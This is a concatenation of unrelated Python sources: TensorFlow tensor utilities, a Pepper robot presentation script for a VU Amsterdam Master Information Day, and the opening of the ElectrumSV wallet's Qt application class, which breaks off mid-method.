            tf.einsum('{0}y,yz->{0}z'.format(s[:r - 1]), input_i,
                      weight[i, :, :]))
      outputs = tf.concat(output_splitted, axis=-1)
  else:
    # Non-TPU (or very high rank) fallback: flatten to rank-2, multiply, and
    # restore the leading dimensions afterwards.
    outputs = BlockDiagonalMatmul(
        tf.reshape(inputs, ToStaticShape([-1, input_dim])), weight, num_blocks)
    outputs = tf.reshape(
        outputs,
        tf.concat([
            tf.cast(GetShape(inputs)[:-1], tf.int32),
            ToStaticShape([output_dim])
        ],
                  axis=0))
  return outputs
def BlockDiagonalProjectLastDimWithMix(inputs,
                                       weight,
                                       input_dim,
                                       output_dim,
                                       mix_kernel,
                                       num_blocks=1):
  """Block diagonal linear projection on the last dim with mix.

  This is a TPU efficient implementation to avoid reshaping inputs to Rank-2
  tensor by using Einsum for the compute.

  Args:
    inputs: An input Tensor, the last dimension of which is input_dim.
    weight: A weight matrix with shape [input_dim, output_dim].
    input_dim: An integer or a symbolic dim, the last dimension of the inputs.
    output_dim: An integer or a symbolic dim, the last dimension of the outputs.
    mix_kernel: an order-2 tf.Tensor of shape (num_blocks, num_blocks).
    num_blocks: An integer or a symbolic dim, the number of blocks.

  Returns:
    An output Tensor of the same rank as inputs, the last dimension is
    output_dim.
  """
  # Resolve symbolic dims to concrete ints before they are used in shapes.
  input_dim = int(
      symbolic.ToStatic(input_dim) if symbolic.IsExpr(input_dim) else input_dim)
  output_dim = int(
      symbolic.ToStatic(output_dim) if symbolic.IsExpr(output_dim
                                                      ) else output_dim)
  # Assert input_dim and output_dim
  # NOTE: the assertions are attached as control dependencies on the tensors
  # themselves, so they run whenever inputs/weight are consumed below.
  inputs = with_dependencies([assert_equal(GetShape(inputs)[-1], input_dim)],
                             inputs)
  weight = with_dependencies([
      assert_equal(GetShape(weight)[0], num_blocks),
      assert_equal(GetShape(weight)[1], input_dim // num_blocks),
      assert_equal(GetShape(weight)[-1], output_dim // num_blocks)
  ], weight)
  # rank < 26 because the einsum below spells one lowercase letter per
  # leading dimension (plus 'y'/'z' for the contraction).
  if (use_tpu() and inputs.shape is not None and
      inputs.shape.rank is not None and inputs.shape.rank < 26):
    # Avoids reshape if feasible and uses Einsum.
    if inputs.shape.rank == 2:
      outputs = BlockDiagonalMatmulWithMix(inputs, weight, mix_kernel,
                                           num_blocks)
    else:
      # This is equivalent to:
      # outputs = tf.einsum('...y,yz->...z', inputs, weight)
      # Unfortunately ... in einsum() leads to extra HBM usage.
      s = ''.join([chr(x) for x in range(97, 123)]) # abc...xyz
      r = inputs.shape.rank
      input_splitted = tf.split(inputs, num_blocks, axis=-1)
      output_splitted = []
      for i, input_i in enumerate(input_splitted):
        output_splitted.append(
            tf.einsum('{0}y,yz->{0}z'.format(s[:r - 1]), input_i,
                      weight[i, :, :]))
      # Linearly mix the per-block results with the mix_kernel weights.
      output_mixed = [0.0] * num_blocks
      for i in range(num_blocks):
        for j in range(num_blocks):
          output_mixed[i] += mix_kernel[i, j] * output_splitted[j]
      output_splitted = output_mixed
      outputs = tf.concat(output_splitted, axis=-1)
  else:
    # Non-TPU (or very high rank) fallback: flatten to rank-2, multiply, and
    # restore the leading dimensions afterwards.
    outputs = BlockDiagonalMatmulWithMix(
        tf.reshape(inputs, ToStaticShape([-1, input_dim])), weight, mix_kernel,
        num_blocks)
    outputs = tf.reshape(
        outputs,
        tf.concat([
            tf.cast(GetShape(inputs)[:-1], tf.int32),
            ToStaticShape([output_dim])
        ],
                  axis=0))
  return outputs
def GetProcessedCheckpoints(runner_dir):
  """Returns the list of checkpoints previously processed by this runner."""
  # The list is persisted to a file so that jobs running on interruptible
  # VMs can resume without duplicating work.
  ledger_path = os.path.join(runner_dir, 'processed_ckpts.txt')
  if not tf.io.gfile.exists(ledger_path):
    # First use: create an empty ledger.
    with tf.io.gfile.GFile(ledger_path, 'w') as f:
      f.write('')
  with tf.io.gfile.GFile(ledger_path, 'r') as f:
    return [line.strip() for line in f.readlines()]
def UpdateProcessedCheckpoints(runner_dir, ckpt_path):
  """Denotes 'ckpt_path' as having been processed by this runner."""
  ledger_path = os.path.join(runner_dir, 'processed_ckpts.txt')
  # Some file systems don't support append operations, so we rewrite whole
  # file to append the latest checkpoint.
  all_ckpts = GetProcessedCheckpoints(runner_dir) + [ckpt_path]
  with tf.io.gfile.GFile(ledger_path, 'w') as f:
    f.write('\n'.join(all_ckpts) + '\n')
def MergeDictsWithValueCheck(dict1, dict2):
  """Merges dict2 into dict1, requiring shared keys to map to the same object.

  Args:
    dict1: dict that is updated in place and returned.
    dict2: dict whose entries are merged into dict1.

  Returns:
    dict1, after absorbing dict2.

  Raises:
    RuntimeError: if a key appears in both dicts with different value objects.
  """
  for key in set(dict1) & set(dict2):
    # Identity (not mere equality) is required for shared keys.
    if dict1[key] is not dict2[key]:
      raise RuntimeError(f'The same key {key} corresponds to different values '
                         f'in the dictionaries: {dict1[key]} vs {dict2[key]}')
  dict1.update(dict2)
  return dict1
def MergeDuplicateIds(ids, paddings, extra_tensors=None):
  """Merge consecutive duplicated ids.

  Given ids = [4, 4, 5, 6, 6, 5, 0, 0] and paddings =[0, 0, 0, 0, 0, 0, 1, 1],
  this function returns ret_ids = [4, 5, 6, 5, 0, 0, 0, 0] and paddings = [
  0, 0, 0, 0, 1, 1, 1, 1] by merging consecutive duplicated ids.

  Args:
    ids: A non-negative tensor of shape [batch, time].
    paddings: A padding tensor of shape [batch, time] with "0" non padded, and
      "1" as padded..
    extra_tensors: A `.NestedMap` containing tensors that need to be
      deduplicated according to ids, each tensor at least has two dimensions.

  Returns:
    ret_ids: same as ids.
    ret_paddings: same as paddings.
    ret_tensors: same as extra_tensors.
  """
  ids = with_dependencies([assert_greater_equal(ids, 0)], ids)
  # Shift ids right by one step; the -1 sentinel guarantees the first id of
  # every row differs from its (nonexistent) predecessor and is kept.
  prev_ids = tf.pad(ids, [[0, 0], [1, 0]], constant_values=-1)[:, :-1]
  # keep[b, t] == 1 iff position t starts a new run and is not padding.
  keep = tf.cast(tf.math.not_equal(ids, prev_ids), tf.int32) * tf.cast(
      1 - paddings, tf.int32)
  b, t = GetShape(ids)
  # Generate descend_keep in descending order for each row and set elements in
  # the matrix to 0 if they are duplicated ids.
  descend_keep = keep * tf.range(t, 0, -1, dtype=tf.int32)
  # Get the indices of non-duplicated ids along the time axis.
  # A stable descending sort moves kept positions (in order) to the front and
  # all dropped/padded positions (zeros, in order) to the back.
  sorted_indices = tf.argsort(descend_keep, stable=True, direction='DESCENDING')
  # Get the batch indices.
  batch_indices = tf.tile(tf.expand_dims(tf.range(b), -1), [1, t])
  # Stack them to get 2-d indices.
  ids_indices = tf.stack([batch_indices, sorted_indices], axis=2)
  # New valid length per row is the number of kept positions.
  seq_mask = tf.sequence_mask(tf.reduce_sum(keep, axis=-1), t, paddings.dtype)
  ret_paddings = 1. - seq_mask
  # Gather the deduplicated ids to the front and zero out the padded tail.
  ret_ids = tf.gather_nd(ids, ids_indices) * tf.cast(seq_mask, ids.dtype)
  ret_tensors = NestedMap()
  if extra_tensors:
    for key, tensor in extra_tensors.items():
      # Apply the same reordering/masking to each extra tensor.
      tensor_mask = ExpandTo(seq_mask, GetRank(tensor))
      ret_tensors[key] = tf.gather_nd(tensor, ids_indices) * tf.cast(
          tensor_mask, tensor.dtype)
  return ret_ids, ret_paddings, ret_tensors
def DecodeProtoField(serialized_protos, message_type, field_name, output_type):
  """Decodes a non-repeated field in a proto.

  Args:
    serialized_protos: A string Tensor of shape [batch].
    message_type: Name of the proto message type. Since tf.io.decode_proto() is
      called with the default descriptor_source='local://', the C++ (not
      Python!) proto definition(s) must be linked to the binary. You can link
      in a proto descriptor by creating a cc_library target with alwayslink=1.
    field_name: Name of the field.
    output_type: A DType for the output.

  Returns:
    A Tensor of shape [batch].
  """
  decoded = tf.io.decode_proto(serialized_protos, message_type, [field_name],
                               [output_type])
  # Exactly one field was requested, so exactly one value tensor comes back.
  [field_values] = decoded.values
  # Drop the trailing size-1 "repeat" dimension of the non-repeated field.
  return tf.squeeze(field_values, -1)
def DecodeRepeatedProtoField(serialized_protos, message_type, field_name,
                             output_type):
  """Decodes a repeated field in a proto.

  Args:
    serialized_protos: A string Tensor of shape [batch].
    message_type: Name of the proto message type. Since tf.io.decode_proto() is
      called with the default descriptor_source='local://', the C++ (not
      Python!) proto definition(s) must be linked to the binary. You can link
      in a proto descriptor by creating a cc_library target with alwayslink=1.
    field_name: Name of the field.
    output_type: A DType for the output.

  Returns:
    A Tensor of shape [batch, field_name_size].
  """
  decoded = tf.io.decode_proto(serialized_protos, message_type, [field_name],
                               [output_type])
  # Exactly one field was requested; keep its full repeated dimension.
  [field_values] = decoded.values
  return field_values
|
masters_day.py | from pepper.framework import *
from pepper.responder import *
from pepper.knowledge import sentences, animations
from pepper.language import Utterance
from pepper.language.generation.reply import reply_to_question
from pepper import config
from threading import Thread
from random import choice
from time import time
# --- Speaker configuration ---
SPEAKER_NAME_THIRD = "Dear guest"
SPEAKER_NAME = "Dear guest"
SPEAKER_FACE = "HUMAN"
DEFAULT_SPEAKER = "Human"
# --- Event / topic configuration ---
TOPIC_NAME = "Master Information Day"
TOPIC_ROBOT_THOUGHT = "A future where humans and robots work together is not too far from now. Masters degrees that give the skills for this future will be very valuable."
LOCATION_NAME = "The main building at the VU"
# Phonetic markup so the TTS engine pronounces the university name correctly.
VU_NAME_PHONETIC = r"\\toi=lhp\\ fraiE universitai_t Amster_dam \\toi=orth\\"
# --- Images shown on the robot's tablet during the presentation ---
IMAGE_VU = "https://www.vu.nl/nl/Images/VUlogo_NL_Wit_HR_RGB_tcm289-201376.png"
IMAGE_SELENE = "http://wordpress.let.vupr.nl/understandinglanguagebymachines/files/2019/06/7982_02_34_Selene_Orange_Unsharp_Robot_90kb.jpg"
IMAGE_LENKA = "http://wordpress.let.vupr.nl/understandinglanguagebymachines/files/2019/06/8249_Lenka_Word_Object_Reference_106kb.jpg"
IMAGE_BRAM = "http://makerobotstalk.nl/files/2018/12/41500612_1859783920753781_2612366973928996864_n.jpg"
IMAGE_LEA = "http://www.cltl.nl/files/2020/03/Lea.jpg"
IMAGE_PIEK = "http://www.cltl.nl/files/2019/10/8025_Classroom_Piek.jpg"
IMAGE_NLP = "https://miro.medium.com/max/1000/1*CtR2lIHDkhB9M8Jt4irSyg.gif"
# --- Question & answer round configuration ---
TOPIC_QUERY = "Masters degrees"
TOPIC_QUESTION = "What master programme are you interested in?"
TOPIC_ANSWER = "Do you have a question for me?"
# Answers shorter than this many tokens trigger one retry of the question.
MIN_ANSWER_LENGTH = 4
# Override Speech Speed for added clarity!
config.NAOQI_SPEECH_SPEED = 90
# Responders tried (in order of specificity) for every user utterance.
RESPONDERS = [
    BrainResponder(),
    VisionResponder(), PreviousUtteranceResponder(), IdentityResponder(), LocationResponder(), TimeResponder(),
    QnAResponder(),
    GreetingResponder(), GoodbyeResponder(), ThanksResponder(), AffirmationResponder(), NegationResponder(),
    UnknownResponder()
]
class PresentTeamApp(AbstractApplication, StatisticsComponent,
                     SubtitlesComponent,
                     BrainComponent, ContextComponent,
                     ObjectDetectionComponent, FaceRecognitionComponent,
                     SpeechRecognitionComponent, TextToSpeechComponent):
    """Base Pepper application mixing in every component this demo needs."""

    # Web page used to render spoken text as on-screen subtitles.
    SUBTITLES_URL = "https://bramkraai.github.io/subtitle?text={}"

    def __init__(self, backend):
        super(PresentTeamApp, self).__init__(backend)
        # Show the VU logo on the robot's tablet at startup.
        self.tablet.show(IMAGE_VU)

    def say(self, text, animation=None, block=True):
        """Speaks `text`, then pauses briefly so utterances don't run together."""
        super(PresentTeamApp, self).say(text, animation, block)
        # NOTE(review): `sleep` is not imported explicitly in this file; it
        # presumably comes from the `pepper.framework` star import -- confirm.
        sleep(1.5)

    def show_text(self, text):
        """Renders `text` as subtitles on the tablet."""
        self.backend.tablet.show(self.SUBTITLES_URL.format(text))
class WaitForStartCueIntention(AbstractIntention, PresentTeamApp):
    """Waits for a spoken or visual cue, then starts the presentation."""

    # A transcript containing any of these (lowercase) phrases starts the show.
    START_CUE_TEXT = [
        "hello",
        "hallo",
        "hi",
        "morning",
        "evening",
        "afternoon",
        "hoi",
        "who are you",
        "a guest arrived",
        "you may begin",
        "you may start",
        "you can begin",
        "you can start",
        "robot"
    ]

    GREET_TIMEOUT = 15  # Only Greet people once every X seconds

    def __init__(self, application):
        """Greets New and Known People"""
        self.name_time = {}  # Dictionary of <name, time> pairs, to keep track of who is greeted when

        super(WaitForStartCueIntention, self).__init__(application)

        # Initialize Response Picker
        self.response_picker = ResponsePicker(self, RESPONDERS)

        # Start Chat with Default Speaker
        self.context.start_chat(DEFAULT_SPEAKER)

    def on_face_known(self, faces):
        """
        On Person Event.
        Called every time a known face is detected.
        """
        for person in faces:
            if self.is_greeting_appropriate(person.name):
                self.say("Hello, {}!".format(person.name))

    def on_face_new(self, faces):
        """
        On New Person Event.
        Called every time an unknown face is detected.
        """
        if self.is_greeting_appropriate("new"):
            self.say("I see a new person!, Hello stranger!")

    def is_greeting_appropriate(self, name):
        """Returns True if greeting is appropriate and updates Greeting Time"""

        # Appropriateness arises when
        #  1. person hasn't been seen before, or
        #  2. enough time has passed since last sighting
        if name not in self.name_time or (time() - self.name_time[name]) > self.GREET_TIMEOUT:
            # Store last seen time (right now) in name_time dictionary
            self.name_time[name] = time()
            # Return "Appropriate"
            return True
        # Return "Not Appropriate"
        return False

    def on_face(self, faces):
        """Starts the Main Intention once a face is observed.

        BUG FIX: two leftover experiments were removed from this method:
        1) `any([self.on_face_new(face) for face in faces])` could never be
           truthy because on_face_new() returns None, so that branch was dead;
        2) `if len(faces) == 0:` announced "I can see <guest>" precisely when
           NO face was detected (on_face is presumably only invoked with
           detected faces, making that branch dead too -- confirm upstream).
        """
        if self.is_greeting_appropriate("new"):
            self.say("I see a new person!, Hello stranger!")
            IntroductionIntention(self.application)

    def on_chat_turn(self, utterance):
        # If Start Text Cue is observed by Leolani -> Respond Happy & Start Main Intention
        transcript = utterance.transcript.lower()
        if any([cue in transcript for cue in self.START_CUE_TEXT]):
            self.say("Oh, {}!".format(choice(sentences.HAPPY)), animation=animations.HAPPY)
            IntroductionIntention(self.application)
            return
class IntroductionIntention(AbstractIntention, PresentTeamApp):
    """Introduces the robot and its team, then hands over to the topic Q&A."""

    def __init__(self, application):
        super(IntroductionIntention, self).__init__(application)

        # Start Chat with Main Speaker
        self.context.start_chat(SPEAKER_NAME)

        # Run the scripted speech off the caller's thread so event callbacks
        # stay responsive while the robot talks.
        Thread(target=self.speech).start()

    def speech(self):
        """Scripted welcome, team introduction and topic teaser."""
        # 1.1 - Welcome
        self.say("Hello {}. Welcome to the {}. ...".format(SPEAKER_NAME, LOCATION_NAME), animations.BOW)
        # BUG FIX: "My apologies is I am slow" -> "My apologies if I am slow".
        self.say("My apologies if I am slow today, my internet connection is not very good")
        self.say("We are thrilled to have you here!")

        # 1.2 - Introduction
        self.say(r"I am lio-lawhni... My name means \\vct=50\\ Voice of an Angel \\vct=100\\. in Hawaiian.",
                 animations.I)
        self.say("I am built by students from the VU that come from all over the world. ", animations.ONCE_UPON_A_TIME)
        self.tablet.show(IMAGE_SELENE)
        sleep(1.0)
        self.say("Selene, from Mexico, designed my brain and thoughts!", animations.TABLET)
        self.tablet.show(IMAGE_LENKA)
        sleep(1.0)
        self.say("Lenka, from Serbia, taught me to understand language", animations.TABLET)
        self.tablet.show(IMAGE_BRAM)
        sleep(1.0)
        self.say("Bram, from the Netherlands, programmed me to perceive the world around me.", animations.TABLET)
        self.tablet.show(IMAGE_LEA)
        sleep(1.0)
        self.say("Lea, from Germany, has recently joined the team and will help me improve my language understanding.",
                 animations.TABLET)
        self.tablet.show(IMAGE_PIEK)
        sleep(1.0)
        # NOTE(review): "Peek" looks like a phonetic spelling of "Piek" for the
        # TTS engine (cf. VU_NAME_PHONETIC) -- confirm before changing it.
        self.say(
            "Peek, from the Netherlands, and I, from France and Japan, work on identity, reference and perspective in language!",
            animations.TABLET)
        self.tablet.show(IMAGE_VU)
        sleep(2.5)

        # 2.1 - Topic Introduction
        self.say("I believe you are here for " + TOPIC_NAME, animations.THINK)
        self.say("Here at the {} there are many interesting programs to choose from! ".format(VU_NAME_PHONETIC),
                 animations.ENTHUSIASTIC)
        self.say("I am just a robot, but I have my little robot thoughts...", animations.SHY)
        self.say(TOPIC_ROBOT_THOUGHT)

        # 2.2 - Topic Knowledge
        self.say("As a robot, I have learned a few things about " + TOPIC_QUERY + " myself!", animations.THINK)
        self.say("For example, the Linguistics Department here offers a specialized program on Text Mining ",
                 animations.JOYFUL)

        # 2.2.1 - Topic in the News
        self.say("{}".format(choice(sentences.USED_WWW)))
        self.say(choice(sentences.FUN_NLP_FACTS))
        self.tablet.show(IMAGE_NLP)
        sleep(5.0)
        # BUG FIX: the previous `.format(choice(sentences.HAPPY))` was a no-op
        # because the string has no placeholder; the dead call was removed.
        self.say("Impressive, right?", animations.EXCITED)

        # 2.2.2 - Topic in Brain
        self.say("I also have been talking about " + TOPIC_NAME + " with my friends!")
        self.topic_in_brain()
        self.say("I learn a lot from my friends!")
        sleep(2.5)

        # Move to Topic QnA
        TopicQuestionIntention(self.application)

    def topic_in_brain(self):
        """Asks the robot's own brain about the topic and speaks the reply."""
        self.answer_brain_query("what is " + TOPIC_QUERY + " ")

    def answer_brain_query(self, query):
        """Runs `query` through the brain; failures are logged, never raised."""
        try:
            question = self.context.chat.add_utterance([UtteranceHypothesis(query, 1)], False)
            question.analyze()
            brain_response = self.brain.query_brain(question)
            reply = reply_to_question(brain_response)
            if reply:
                self.say(reply, block=False)
        except Exception as e:
            # Best effort: a failed brain query must not crash the show.
            self.log.error(e)
# 2.3 - Topic Question
class TopicQuestionIntention(AbstractIntention, PresentTeamApp):
    """Asks the guest the topic question and listens for a usable answer."""

    def __init__(self, application):
        super(TopicQuestionIntention, self).__init__(application)

        self.response_picker = ResponsePicker(self, RESPONDERS)
        self._retried = False

        # Make sure a chat with the guest is running
        if not self.context.chatting:
            self.context.start_chat(SPEAKER_NAME)

        # Pose the topic question, both on screen and out loud
        self.say("Oh {}, I think I have a question for you!".format(SPEAKER_NAME), animations.EXPLAIN)
        self.show_text(TOPIC_QUESTION)
        self.say(TOPIC_QUESTION)

    def on_chat_turn(self, utterance):
        responder = self.response_picker.respond(utterance)

        if self.context.chat.last_utterance.transcript.endswith("?"):
            self.say("Oops, nevermind me asking these questions. I'm just a very curious robot!", animations.ASHAMED)

        answer_too_short = (isinstance(responder, UnknownResponder) and
                            len(utterance.tokens) < MIN_ANSWER_LENGTH)
        if answer_too_short and not self._retried:
            # Didn't catch that: repeat the question, but only once
            self._retried = True
            self.say("But, {}".format(TOPIC_QUESTION))
        else:
            # Good enough: thank the guest and move on to the answer round
            self.say("That sounds interesting! I wish you the best of luck", animations.HAPPY)
            self.tablet.show(IMAGE_VU)
            TopicAnswerIntention(self.application)
# 2.4 - Topic Answer
class TopicAnswerIntention(AbstractIntention, PresentTeamApp):
    """Invites the guest to ask the robot a question, then wraps up."""

    def __init__(self, application):
        super(TopicAnswerIntention, self).__init__(application)

        self.response_picker = ResponsePicker(self, RESPONDERS)
        self._retried = False

        # Make sure a chat with the guest is running
        if not self.context.chatting:
            self.context.start_chat(SPEAKER_NAME)

        # Invite the guest to ask their question, on screen and out loud
        self.show_text(TOPIC_ANSWER)
        self.say(TOPIC_ANSWER)

    def on_chat_turn(self, utterance):
        responder = self.response_picker.respond(utterance)

        if self.context.chat.last_utterance.transcript.endswith("?"):
            self.say("Oops, nevermind me asking these questions. I'm just a very curious robot!", animations.ASHAMED)

        answer_too_short = (isinstance(responder, UnknownResponder) and
                            len(utterance.tokens) < MIN_ANSWER_LENGTH)
        if answer_too_short and not self._retried:
            # Didn't catch that: repeat the invitation, but only once
            self._retried = True
            self.say("But, {}".format(TOPIC_ANSWER))
        else:
            # Good enough: thank the guest and move on to the outro
            self.say("Thank you!", animations.HAPPY)
            self.tablet.show(IMAGE_VU)
            OutroIntention(self.application)
class OutroIntention(AbstractIntention, PresentTeamApp):
    """Closing intention: wishes the audience a good discussion, says goodbye
    to the speaker, and then falls back to the default small-talk behaviour."""

    def __init__(self, application):
        super(OutroIntention, self).__init__(application)
        self.response_picker = ResponsePicker(self, RESPONDERS)
        # Make sure a chat session with the speaker is active.
        if not self.context.chatting:
            self.context.start_chat(SPEAKER_NAME)
        # Deliver the outro from a worker thread so the event loop stays live.
        Thread(target=self.speech).start()

    def speech(self):
        # 5.1 - Wish all a fruitful discussion (count visible persons).
        people_seen = sum(1 for obj in self.context.objects if obj.name == "person")
        self.say("I see that there are {0} people here... I wish all {0} of you a fruitful discussion!".format(
            people_seen), animations.HELLO)
        # 5.2 - Goodbye
        self.say("It's a pity we could not talk more and get to know each other.",
                 animations.FRIENDLY)
        self.say("It was nice having talked to you, {}! ... ...".format(SPEAKER_NAME), animations.BOW)
        self.say("If you have any questions, you can always ask me later!")
        sleep(4)
        self.say("You may make a selfie with me! I love pictures!", animations.HAPPY)
        # Hand control back to the default intention.
        DefaultIntention(self.application)
class DefaultIntention(AbstractIntention, PresentTeamApp):
    """Fallback small-talk intention: greets people who enter the chat, says
    goodbye when they leave, and temporarily ignores people who just said
    goodbye so they are not immediately greeted again."""

    # Seconds before a person who said goodbye may be greeted again.
    IGNORE_TIMEOUT = 60

    def __init__(self, application):
        super(DefaultIntention, self).__init__(application)
        self._ignored_people = {}
        self.response_picker = ResponsePicker(self, RESPONDERS)

    def on_chat_enter(self, name):
        # Drop entries whose ignore window has expired.
        still_ignored = {}
        for person, stamp in self._ignored_people.items():
            if time() - stamp < self.IGNORE_TIMEOUT:
                still_ignored[person] = stamp
        self._ignored_people = still_ignored

        if name not in self._ignored_people:
            self.context.start_chat(name)
            self.say("{}, {}".format(choice(sentences.GREETING), name))

    def on_chat_exit(self):
        self.say("{}, {}".format(choice(sentences.GOODBYE), self.context.chat.speaker))
        self.context.stop_chat()

    def on_chat_turn(self, utterance):
        picked = self.response_picker.respond(utterance)
        if isinstance(picked, GoodbyeResponder):
            # Speaker said goodbye: stop chatting and ignore them for a while.
            self._ignored_people[utterance.chat.speaker] = time()
            self.context.stop_chat()

    def on_face(self, faces):
        self.say("Ah, I can see someone! Let me begin!")
        WaitForStartCueIntention(self.application)
if __name__ == '__main__':
    # Entry point: build the application on the configured robot backend.
    application = PresentTeamApp(config.get_backend())
    # Install the first intention; presumably it waits for the start cue
    # before beginning the presentation -- confirm against its definition.
    WaitForStartCueIntention(application)
    # Hand control to the application's event loop (blocks until shutdown).
    application.run()
|
app.py | # ElectrumSV - lightweight Bitcoin client
# Copyright (C) 2019-2020 The ElectrumSV Developers
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
'''ElectrumSV application.'''
import concurrent
import concurrent.futures
import datetime
import os
from functools import partial
import signal
import sys
import threading
from typing import Callable, Optional

from aiorpcx import run_in_thread
import PyQt5.QtCore as QtCore
from PyQt5.QtCore import pyqtSignal, QObject, QTimer
from PyQt5.QtGui import QGuiApplication
from PyQt5.QtWidgets import QApplication, QSystemTrayIcon, QMenu, QWidget, QDialog

from electrumsv.app_state import app_state
from electrumsv.contacts import ContactEntry, ContactIdentity
from electrumsv.i18n import _, set_language
from electrumsv.logs import logs
from electrumsv.wallet import AbstractAccount, Wallet
from electrumsv.wallet_database.tables import WalletEventRow

from . import dialogs
from .cosigner_pool import CosignerPool
from .main_window import ElectrumWindow
from .exception_window import Exception_Hook
from .label_sync import LabelSync
from .log_window import SVLogWindow, SVLogHandler
from .util import ColorScheme, get_default_language, MessageBox, read_QIcon
from .wallet_wizard import WalletWizard
logger = logs.get_logger('app')
class OpenFileEventFilter(QObject):
    """Event filter that routes ``QEvent.FileOpen`` events (e.g. a payment URI
    clicked on macOS) to the first open wallet window."""

    def __init__(self, windows):
        super().__init__()
        # Live list of open windows, shared with (and mutated by) the app.
        self.windows = windows

    def eventFilter(self, obj, event):
        """Consume FileOpen events by forwarding their URL to the first
        window; all other events propagate normally."""
        if event.type() == QtCore.QEvent.FileOpen:
            # Idiomatic truthiness check instead of `len(...) >= 1`.
            if self.windows:
                self.windows[0].pay_to_URI(event.url().toString())
                return True
        return False
class SVApplication(QApplication):
    """The ElectrumSV Qt application object.

    Owns process-wide GUI state: the system tray icon, the list of open
    wallet windows, and the Qt signals other components connect to for
    cross-thread notifications.
    """

    # Signals need to be on a QObject
    create_new_window_signal = pyqtSignal(str, object)
    cosigner_received_signal = pyqtSignal(object, object)
    labels_changed_signal = pyqtSignal(object, object, object)
    window_opened_signal = pyqtSignal(object)
    window_closed_signal = pyqtSignal(object)
    # Async tasks
    async_tasks_done = pyqtSignal()
    # Logging
    new_category = pyqtSignal(str)
    new_log = pyqtSignal(object)
    # Preferences updates
    fiat_ccy_changed = pyqtSignal()
    custom_fee_changed = pyqtSignal()
    op_return_enabled_changed = pyqtSignal()
    num_zeros_changed = pyqtSignal()
    base_unit_changed = pyqtSignal()
    fiat_history_changed = pyqtSignal()
    fiat_balance_changed = pyqtSignal()
    update_check_signal = pyqtSignal(bool, object)
    # Contact events
    contact_added_signal = pyqtSignal(object, object)
    contact_removed_signal = pyqtSignal(object)
    identity_added_signal = pyqtSignal(object, object)
    identity_removed_signal = pyqtSignal(object, object)

    new_notification = pyqtSignal(object, object)

    def __init__(self, argv):
        QtCore.QCoreApplication.setAttribute(QtCore.Qt.AA_X11InitThreads)
        if hasattr(QtCore.Qt, "AA_ShareOpenGLContexts"):
            QtCore.QCoreApplication.setAttribute(QtCore.Qt.AA_ShareOpenGLContexts)
        if hasattr(QGuiApplication, 'setDesktopFileName'):
            QGuiApplication.setDesktopFileName('electrum-sv.desktop')
        super().__init__(argv)
        self.windows = []               # open ElectrumWindow instances
        self.log_handler = SVLogHandler()
        self.log_window = None          # lazily created log viewer
        self.net_dialog = None          # lazily created network dialog
        self.timer = QTimer()
        self.exception_hook = None
        # A floating point number, e.g. 129.1
        self.dpi = self.primaryScreen().physicalDotsPerInch()

        # init tray
        self.dark_icon = app_state.config.get("dark_icon", False)
        self.tray = QSystemTrayIcon(self._tray_icon(), None)
        self.tray.setToolTip('ElectrumSV')
        self.tray.activated.connect(self._tray_activated)
        self._build_tray_menu()
        self.tray.show()

        set_language(app_state.config.get('language', get_default_language()))

        logs.add_handler(self.log_handler)
        self._start()

    def _start(self):
        """Install the window icon and event filter, and wire the
        preference-change signals through to every open window."""
        self.setWindowIcon(read_QIcon("electrum-sv.png"))
        self.installEventFilter(OpenFileEventFilter(self.windows))
        self.create_new_window_signal.connect(self.start_new_window)
        self.async_tasks_done.connect(app_state.async_.run_pending_callbacks)
        self.num_zeros_changed.connect(partial(self._signal_all, 'on_num_zeros_changed'))
        self.fiat_ccy_changed.connect(partial(self._signal_all, 'on_fiat_ccy_changed'))
        self.base_unit_changed.connect(partial(self._signal_all, 'on_base_unit_changed'))
        self.fiat_history_changed.connect(partial(self._signal_all, 'on_fiat_history_changed'))
        # Toggling of showing addresses in the fiat preferences.
        self.fiat_balance_changed.connect(partial(self._signal_all, 'on_fiat_balance_changed'))
        self.update_check_signal.connect(partial(self._signal_all, 'on_update_check'))
        ColorScheme.update_from_widget(QWidget())

    def _signal_all(self, method, *args):
        """Invoke `method(*args)` on every open window."""
        for window in self.windows:
            getattr(window, method)(*args)

    def _close(self):
        """Close every open wallet window (tray 'Exit' action)."""
        for window in self.windows:
            window.close()

    def close_window(self, window) -> None:
        # NOTE: `ElectrumWindow` removes references to itself while it is closing. This creates
        # a problem where it gets garbage collected before its Qt5 `closeEvent` handling is
        # completed and on Linux/MacOS it segmentation faults. On Windows, it is fine.
        QTimer.singleShot(0, partial(self._close_window, window))
        logger.debug("app.close_window.queued")

    def _close_window(self, window):
        """Tear a window down: stop its wallet, drop it from bookkeeping and
        notify listeners; closes shared dialogs when the last window goes."""
        logger.debug(f"app.close_window.executing {window!r}")
        app_state.daemon.stop_wallet_at_path(window._wallet.get_storage_path())
        self.windows.remove(window)
        self.window_closed_signal.emit(window)
        self._build_tray_menu()
        if not self.windows:
            self._last_window_closed()

    def setup_app(self):
        # app_state.daemon is initialised after app. Setup things dependent on daemon here.
        pass

    def _build_tray_menu(self):
        """(Re)populate the tray context menu with one submenu per window."""
        # Avoid immediate GC of old menu when window closed via its action
        if self.tray.contextMenu() is None:
            m = QMenu()
            self.tray.setContextMenu(m)
        else:
            m = self.tray.contextMenu()
            m.clear()
        for window in self.windows:
            submenu = m.addMenu(window._wallet.name())
            submenu.addAction(_("Show/Hide"), window.show_or_hide)
            submenu.addAction(_("Close"), window.close)
        m.addAction(_("Dark/Light"), self._toggle_tray_icon)
        m.addSeparator()
        m.addAction(_("Exit ElectrumSV"), self._close)
        self.tray.setContextMenu(m)

    def _tray_icon(self):
